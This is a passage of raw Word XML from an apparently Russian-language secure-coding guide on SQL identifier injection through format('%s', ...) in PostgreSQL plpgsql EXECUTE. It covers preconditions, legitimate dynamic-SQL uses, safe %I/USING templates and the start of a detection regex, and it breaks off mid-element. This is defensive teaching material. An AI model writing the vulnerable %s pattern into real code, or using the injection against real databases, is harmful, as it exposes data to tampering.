        <w:t xml:space="preserve"> (C-printf vs SQL identifier). Разработчики, знакомые с Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str.format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sprintf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, инстинктивно пишут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для всех substitutions — и в plpgsql это создаёт уязвимость для identifier-position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE6C4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сочетание этих трёх фактов даёт identifier-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:t>: payload интерпретируется как multi-statement SQL внутри EXECUTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7DC341" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B86310" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии с plpgsql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функцией (с 9.1, август 2011). До 9.1 функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отсутствовала — использовали </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую, что концептуально одинаково.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD3D78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE на уязвимую plpgsql-функцию. Без SECURITY DEFINER — нужны те же права, что у caller (RCE/DROP внутри функции исполняется под caller). С SECURITY DEFINER (3.16.5) — права owner функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC0A93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', x)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format(... %s ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в position, где x — identifier; либо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пропущен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E651E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dynamic SQL в plpgsql — стандартный паттерн для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A272F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-tenant routing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (выбор таблицы по tenant-name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E1681" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generic CRUD-функций</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (один helper для разных таблиц с одинаковой схемой)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D24A4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reporting frameworks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (динамический select-list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F793421" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Schema management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CREATE/ALTER/DROP с computed именами)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1ACC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Корректные шаблоны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD4EFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 1: identifier через %I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C28D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_count(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326726D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS bigint LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500A8A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552B51C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result bigint;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAAD9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE353F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('SELECT COUNT(*) FROM %I', tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B186B0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF4FB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0631639E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC752DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC266B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 2: identifier + value через USING (см. 3.16.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB3514" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_by_id(tbl_name text, row_id int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125FF565" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS jsonb LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0655CEDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED4CA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result jsonb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA252C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E40EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('SELECT to_jsonb(t) FROM %I AS t WHERE id = $1', tbl_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791DE3D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        INTO result USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABAB934" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FAA60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917FE57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388524CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1941A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 3: schema-qualified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB9C28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_count_qual(schema_name text, tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA2AE42" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS bigint LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503DA0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD09717" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result bigint;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5040FE95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687380EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('SELECT COUNT(*) FROM %I.%I', schema_name, tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32260C65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B641AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03027287" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF04F15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1116884A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (на plpgsql коде через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format\s*\([^)]*%s[^)]*[a-z_]+\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> где аргумент похож на identifier (tbl, table_name, col, column_name). Альтернатива — AST-walk через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
